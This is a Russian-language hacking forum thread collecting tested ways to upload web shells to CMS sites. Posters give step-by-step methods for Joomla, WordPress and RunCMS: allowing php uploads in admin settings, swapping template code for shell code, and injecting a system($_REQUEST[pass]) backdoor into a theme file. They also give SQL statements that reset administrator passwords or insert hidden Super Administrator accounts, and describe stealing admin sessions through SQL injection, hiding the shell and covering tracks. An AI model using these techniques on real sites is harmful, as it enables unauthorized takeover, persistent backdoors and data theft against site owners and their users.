Старый 02.07.2010, 18:26   #1
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию Заливка шелла в CMS

В этой теме собираем способы заливки шелла в CMS/Blogs. Все способы, которые вы постите, должны быть проверены лично вами и быть 100% рабочими, если на какой-то версии не работает, то писать версии, на которых проверялось и все зависимости. Так что не просто копипастим с паблика, а проверяем/дорабатываем/описываем. Естественно, будет замечательно, если вы найдете новые способы заливки.

Последний раз редактировалось Ded MustD!e; 02.07.2010 в 20:27..
Ded MustD!e вне форума   Ответить с цитированием
Старый 06.07.2010, 11:47   #2
CyberHunter
 
Регистрация: 05.07.2010
Сообщений: 8
Репутация: 1
По умолчанию Заливка шелла в CMS Joomla! 1.5

Тестировал на: Joomla! 1.5
Требования: Доступ в админку.
Заходим в админку, находим там Global Configuration. Там же переходим на вкладку System. Находим Legal Extensions (File Types) и прописываем туда нужное расширения (т.е. php) и сохраняем.
Дальше заходим в Media Manager, выбираем папку для будущего шелла, открываем ее, выбираем файл который будем заливать (т.е. веб-шелл) нажимаем Start Upload File.
Шелл будет находится в папке images (по дефолту) или в той папке которую вы выбрали, типа: joomlasite.com/images/papka_s_shellom.
Работает на joomla! 1.5, но встречались не полные админки, в которых не было возможности заливать файлы (тупо не было такой кнопки), вот там и нет возможности залить шелл данным способом.
CyberHunter вне форума   Ответить с цитированием
Старый 26.01.2012, 17:51   #3
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от CyberHunter Посмотреть сообщение
Тестировал на: Joomla! 1.5
Требования: Доступ в админку.
Заходим в админку, находим там Global Configuration. Там же переходим на вкладку System. Находим Legal Extensions (File Types) и прописываем туда нужное расширения (т.е. php) и сохраняем.
Дальше заходим в Media Manager, выбираем папку для будущего шелла, открываем ее, выбираем файл который будем заливать (т.е. веб-шелл) нажимаем Start Upload File.
Шелл будет находится в папке images (по дефолту) или в той папке которую вы выбрали, типа: joomlasite.com/images/papka_s_shellom.
Работает на joomla! 1.5, но встречались не полные админки, в которых не было возможности заливать файлы (тупо не было такой кнопки), вот там и нет возможности залить шелл данным способом.
Check MIME Types еще надо отключать если включено, на вкладке System, и не забыть все на свое место поставить после всех действий.
}{оттабыч вне форума   Ответить с цитированием
Старый 07.07.2010, 07:58   #4
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию Joomla

Joomla

Удобно, если есть возможность изменять jos_users, например доступен phpMyAdmin.

- сохраняем jos_users
- меняем username и password на

admin
a458d1ff993a5b5ebdc483536bb8a3c6:H6AIIOKetGMm9EaSR snlq06yw2MunwRu

встречается два типа хеша, если md5, то
e10adc3949ba59abbe56e057f20f883e

Можно не редактировать админа, а добавить нового.

заходим в админку, admin:123456, дальше три варианта

- Общие настройки->Система, настраиваем разрешенные расширения для Медиа менеджера и заливаем через него. Путь виден.

- Редактируем Расширения->Менеджер шаблонов, проверяем доступность на запись (зеленый цвет каталога) выбираем неактивный шаблон, запоминаем, заменяем на код шелла, сохраняем, видим путь до шелла, запускаем его, переписываем в другое место, маскируем. Возвращаем шаблон на место.

- Редактируем Расширения->Менеджер языков, аналогично шаблонам (иногда редактирование недоступно)

Возвращаем исходное состояние jos_users.

PS проверял для версии <= 1.5.15.
nikp вне форума   Ответить с цитированием
Старый 15.04.2014, 03:55   #5
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
Joomla

Удобно, если есть возможность изменять jos_users, например доступен phpMyAdmin.

- сохраняем jos_users
- меняем username и password на

admin
a458d1ff993a5b5ebdc483536bb8a3c6:H6AIIOKetGMm9EaSR snlq06yw2MunwRu

встречается два типа хеша, если md5, то
e10adc3949ba59abbe56e057f20f883e

Можно не редактировать админа, а добавить нового.

заходим в админку, admin:123456, дальше три варианта

- Общие настройки->Система, настраиваем разрешенные расширения для Медиа менеджера и заливаем через него. Путь виден.

- Редактируем Расширения->Менеджер шаблонов, проверяем доступность на запись (зеленый цвет каталога) выбираем неактивный шаблон, запоминаем, заменяем на код шелла, сохраняем, видим путь до шелла, запускаем его, переписываем в другое место, маскируем. Возвращаем шаблон на место.

- Редактируем Расширения->Менеджер языков, аналогично шаблонам (иногда редактирование недоступно)

Возвращаем исходное состояние jos_users.

PS проверял для версии <= 1.5.15.
Еще через пакет в менеджере расширений можно, тупо выбераем шелл и он будет в /tmp из веба. Аналогично из "Установить из URL". Чтоб попасть в бекенд и делать все эти манипуляции, например, имея SQL inj, можно прочитать сессию админа(найти можно по id или username в #__session), теперь пасс уже сложный, phpass в той джумле. )
}{оттабыч вне форума   Ответить с цитированием
Старый 21.04.2014, 23:16   #6
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
Еще через пакет в менеджере расширений можно, тупо выбераем шелл и он будет в /tmp из веба. Аналогично из "Установить из URL". Чтоб попасть в бекенд и делать все эти манипуляции, например, имея SQL inj, можно прочитать сессию админа(найти можно по id или username в #__session), теперь пасс уже сложный, phpass в той джумле. )
Еще некоторое дополнение: иногда администарторы ставят дополнительный backend-пароль с использованием rsfirewall, так от в БД в табличке #_rsfirewall_configuration в колонке backend_password находится этот пароль в md5.
Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
В компонент для Joomla 2.5 и 1.5 вложил сжатый шелл wso без пасса
скачать

шелл доступен по адресу:
/components/com_helloworld/helloworld.php joomla 2.5
/components/com_hello/hello.php joomla 1.5
Второй компонент еще заливается на Joomla 3 ветки(проверено на Joomla 3.2.3)

Цитата:
Сообщение от nikp Посмотреть сообщение
Joomla

Удобно, если есть возможность изменять jos_users, например доступен phpMyAdmin.

- сохраняем jos_users
- меняем username и password на

admin
a458d1ff993a5b5ebdc483536bb8a3c6:H6AIIOKetGMm9EaSR snlq06yw2MunwRu

встречается два типа хеша, если md5, то
e10adc3949ba59abbe56e057f20f883e

Можно не редактировать админа, а добавить нового.

заходим в админку, admin:123456, дальше три варианта

- Общие настройки->Система, настраиваем разрешенные расширения для Медиа менеджера и заливаем через него. Путь виден.

- Редактируем Расширения->Менеджер шаблонов, проверяем доступность на запись (зеленый цвет каталога) выбираем неактивный шаблон, запоминаем, заменяем на код шелла, сохраняем, видим путь до шелла, запускаем его, переписываем в другое место, маскируем. Возвращаем шаблон на место.

- Редактируем Расширения->Менеджер языков, аналогично шаблонам (иногда редактирование недоступно)

Возвращаем исходное состояние jos_users.

PS проверял для версии <= 1.5.15.
Код:
UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;
Joomla 1,2,3, все кушают такой md5 норм )

Последний раз редактировалось }{оттабыч; 22.04.2014 в 01:12..
}{оттабыч вне форума   Ответить с цитированием
Старый 10.06.2014, 01:20   #7
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
Код:
UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;
Joomla 1,2,3, все кушают такой md5 норм )
Wordpress также кушает такой md5 норм)

Например, имея доступ к БД соседа, можно, вместо
Код:
update `wp_users` set `user_pass`='$P$BX9kp6Gnd23dz8vv4doZSSvI.awvZr.' where id=3
написать
Код:
update `wp_users` set `user_pass`= md5('admin') where id=3
После авторизации в БД будет более секурный хеш.

Ссылки:
http://www.openwall.com/phpass/
http://eamann.com/tech/wordpress-password-hashing/

Цитата:
To prevent breaking backwards compatibility, MD5-hashed passwords stored in the database are still valid. When a user logs in with such a password, WordPress detects MD5 was used, rehashes the password using the more secure method, and stores the new hash in the database.

Последний раз редактировалось }{оттабыч; 10.06.2014 в 01:25..
}{оттабыч вне форума   Ответить с цитированием
Старый 05.11.2014, 18:46   #8
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
Еще некоторое дополнение: иногда администарторы ставят дополнительный backend-пароль с использованием rsfirewall, так от в БД в табличке #_rsfirewall_configuration в колонке backend_password находится этот пароль в md5.Второй компонент еще заливается на Joomla 3 ветки(проверено на Joomla 3.2.3)

Код:
UPDATE `jos_users` SET `password`= md5('123456') WHERE `id`=62;
Joomla 1,2,3, все кушают такой md5 норм )
только вот так #__rsfirewall_configuration

Только что был случай, что в колонке value находится хеш md5, если where name='backend_password'

тащить вот так concat_ws(0x3a,name,value)

короче, возможно 2 варианта, я хотел сказать:

1. в БД в табличке #__rsfirewall_configuration в колонке backend_password находится этот пароль в md5.
2. select concat_ws(0x3a,name,value) from #__rsfirewall_configuration where name='backend_password'

2 рабочий, только что попалось, что у меня.

Последний раз редактировалось omen666; 05.11.2014 в 19:05..
omen666 вне форума   Ответить с цитированием
Старый 08.11.2014, 13:09   #9
omen666
 
Регистрация: 05.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Касаемо Joomla =)

Иногда можно прочитать конфиги и приконектиться к БД, например, шелл по соседству и т.д.

Мы можем создать нового админа, а также сбросить пасс старого.

Чтоб создать админа в ветке >= 2.5
SELECT id from jos_users; -> смотрим свободный ID

Запрос на добавление
INSERT INTO jos_users(id,name,username,email,password,usertype ,block,sendEmail,registerDate,lastvisitDate,activa tion,params,lastResetTime,resetCount) VALUES ('728', 'blade', 'blade', 'blade@mailforspam.com','531b5f50f082c59730b3bf7f9 c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT', 'Super Administrator', '0', '1', '', '', '', '', '', '0');

Наш хеш
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYF GltJGNNIvjmcRcT => 123 это наш пароль

Добавляем в групу админов
INSERT INTO jos_user_usergroup_map values (728,8);

Если нужно удалить, то вот запросы
DELETE FROM jos_user_usergroup_map where user_id=728;
DELETE FROM jos_users where id=728;

Теперь расмотрим как создать админа Joomla ветки 1.5, пишу без объяснений тут уже
SELECT id from jos_users;

INSERT INTO jos_users(id,name,username,email,password,usertype ,block,sendEmail,gid) values(100,'newadmin','admin','123@example.com','5 31b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFG ltJGNNIvjmcRcT','Super Administrator',0,1,25);
'531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GY FGltJGNNIvjmcRcT = 123

INSERT INTO jos_core_acl_aro VALUES (100,'users','100',0,'Administrator',0);
INSERT INTO jos_core_acl_groups_aro_map VALUES (25,'',100);
DELETE FROM jos_core_acl_groups_aro_map where aro_id=100;

DELETE from jos_core_acl_aro where id=100;
DELETE from jos_users where id=100;

Или можно сменить пасс и усе )
UPDATE `main_users` SET `password`= md5('123') WHERE `id`=837;
UPDATE `main_users` SET `password`= 'e2cd990b203805ca53fb765e34e8f79a:rPU13Eip5jxRj65s sgE1edHW9CGOU5Kq' WHERE `id`=837;

Значит, у нас есть администратор, но зачастую мы не можем попасть в админку, так как не знаем URL сайта.
Иногда нам и необязательно и сама админчасть, бывают случаи, что можно залиться с фронтенда, главное залогиниться з правами и поиследовать си-му.

Как узнать URL сайта на Joomla?
Переменная $live_site в configuration.php в корне(обычно пустая, но при переезде на новый домен и т.д объявляют)
колонки old_url, referer в jos_redirect_links
конфиги веб-сервера
reverse ip lookup

Последний раз редактировалось omen666; 08.11.2014 в 13:46..
omen666 вне форума   Ответить с цитированием
Старый 07.07.2010, 08:18   #10
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию RunCMS v2.1

RunCMS v2.1

1 способ:

Если Apache выполняет файлы с расширением .php.bla, то в
Администрирование->Управление модулями->Архив файлов->Основные настройки->Допустимые форматы файла добавляем |.zp
и заливаемся из Администрирование->Управление модулями->Архив файлов->Добавить, редактировать или удалить раздел/файл.
Ищем по адресу:
http://localhost/runcms/modules/downloads/cache/files/shell.php.zp

В чистом виде .php разрешить не получится, т.к. в коде определено
PHP код:
// Fix for bad extension  Thanks to Philippe of E-rcxfr.com (ExV2) for this patch.
$badarray = array(=> '.php',=> '.php3',=> '.php4',=> '.exe',=> '.php5',=> '.cgi',=> '.pl',=> '.sh',=> '.phtml',=> '.shtml',10 => '. shtm',11 => '.phtm');
$is in_array ($this->file[$filename]['extension'], $badarray);
// и запрет 
Фокусы с .php%00 не проходят, т.к. меняется на .php_00
PHP код:
function set_basename($value$filename='uploaded_files') {
    
$this->file[$filename]['basename'] = strtolowerpreg_replace('/[^a-z0-9_.-]/i''_'$value) ); 

2 способ:

В Администрирование->Основные настройки сайта смотрим "Скин по умолчанию" и редактируем его в
Администрирование->Редактор тем->runcms2
Редактируем, например themeheader.html, как рукам нравится
Код:
<td  id ="divers"><br /><b><?php echo _TH_HEADER_TXT;?></b>
<td  id ="divers"><br /><b><?php echo _TH_HEADER_TXT;if($_REQUEST[pass]) system($_REQUEST[pass]);?></b>
http://localhost/runcms/modules/news/
post
pass=ls -lia


3 способ

Администрирование->Редактор тем
загружаем новую тему в zip архиве, должна быть соблюдена структура темплейта.

шелл будет тут
http://localhost/runcms/themes/ops/theme.php

Облегченная тема с минишеллом в аттаче, можно заменить на свой шелл.
Вложения
Тип файла: zip ops.zip (3.0 Кб, 974 просмотров)
nikp вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot